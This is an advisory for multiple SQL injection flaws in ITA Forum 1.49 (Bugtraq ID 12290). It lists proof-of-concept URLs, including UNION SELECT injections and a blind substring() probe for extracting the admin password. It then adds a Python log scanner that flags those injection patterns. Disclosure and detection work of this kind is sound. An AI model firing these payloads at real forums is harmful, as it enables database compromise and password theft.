ITA Forum Multiple SQL Injection Vulnerabilities
BID:12290
Info
| Bugtraq ID: | 12290 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 17 2005 12:00AM |
| Updated: | Jan 17 2005 12:00AM |
| Credit: | Discovery of this vulnerability is credited to Rush Security Team <www.rst.void.ru>. |
| Vulnerable: | ITA Forum ITA Forum 1.49 |
| Not Vulnerable: | |
Discussion
ITA Forum is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to the application failing to properly sanitize user-supplied input before it is used in SQL queries.
Successful exploitation could result in compromise of the application or disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
These vulnerabilities reportedly affect ITA Forum 1.49; earlier versions may also be affected.
Exploit / POC
No exploit is required. The following proofs of concept were supplied by the discoverer of this vulnerability:
http://www.example.com/showuser.php?uid=x'[SQL_CODE_HERE]
http://www.example.com/showforum.php?fid=666'[SQL_CODE_HERE]
http://www.example.com/showthread.php?fid=[such_forum_ID]&tid=666'[SQL_CODE_HERE]
http://www.example.com/search.php?Submit=true&search=test_by_r57')/**/UNION/**/SELECT/**/1,2,"VULNERABLED!",4,5,6,7,8%23
http://www.example.com/search.php?Submit=true&search=test_by_r57')/**/UNION/**/SELECT/**/1,2,"VULNERABLED!",4,5,6,7,8/*
http://www.example.com/adduser.php?user_pass1=ghc4ever&user_pass2=ghc4ever&[email protected]&Submit=true&user_login=admin'%20AND%20substring(user_pass,[POS],1)=[CHAR]/*
The discoverer of this vulnerability has supplied the following exploit for 'showuser.php' and 'adduser.php':
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
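With no vendor patch listed, web server logs can be checked for requests that put SQL metacharacters into the parameters named in the proof-of-concept URLs. The following is an added example, not part of the original advisory or of ITA Forum; the log lines are constructed, the log format is assumed to be the common access-log format, and the marker list is an assumption drawn from the PoC strings.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> parameter shown as injectable in the advisory's proof-of-concept URLs.
WATCHED = {
    "showuser.php": {"uid"},
    "showforum.php": {"fid"},
    "showthread.php": {"tid"},
    "search.php": {"search"},
    "adduser.php": {"user_login"},
}

# Assumption: markers taken from the PoC strings (quote, SQL comments, UNION SELECT, substring()).
MARKERS = re.compile(r"'|/\*|\*/|#|--|\bunion\b.*\bselect\b|\bsubstring\s*\(", re.I | re.S)

# Request field of a common/combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation-range addresses), not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Jan/2005:10:00:01 +0000] "GET /showuser.php?uid=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [17/Jan/2005:10:00:07 +0000] "GET /showuser.php?uid=x%27 HTTP/1.1" 200 312',
    '192.0.2.44 - - [17/Jan/2005:10:00:09 +0000] "GET /search.php?Submit=true&search=t%27)/**/UNION/**/SELECT/**/1,2%23 HTTP/1.1" 200 801',
    '192.0.2.10 - - [17/Jan/2005:10:00:15 +0000] "GET /showthread.php?fid=3&tid=41 HTTP/1.1" 200 9034',
    '192.0.2.44 - - [17/Jan/2005:10:00:21 +0000] "GET /adduser.php?Submit=true&user_login=admin%27/* HTTP/1.1" 200 640',
]

def suspicious_requests(log_lines):
    """Return (line_no, script, param, decoded_value) for watched parameters carrying SQL markers."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue  # not a recognisable request line
        url = urlsplit(m.group(1))
        script = url.path.rsplit("/", 1)[-1].lower()
        # parse_qsl percent-decodes values, so %27 and %23 are seen as ' and #.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name in WATCHED.get(script, ()) and MARKERS.search(value):
                hits.append((line_no, script, name, value))
    return hits

if __name__ == "__main__":
    for line_no, script, name, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {line_no}: {script} {name}={value!r}")
```

An apostrophe or `#` in a legitimate search term also matches, so hits on `search.php` need manual review.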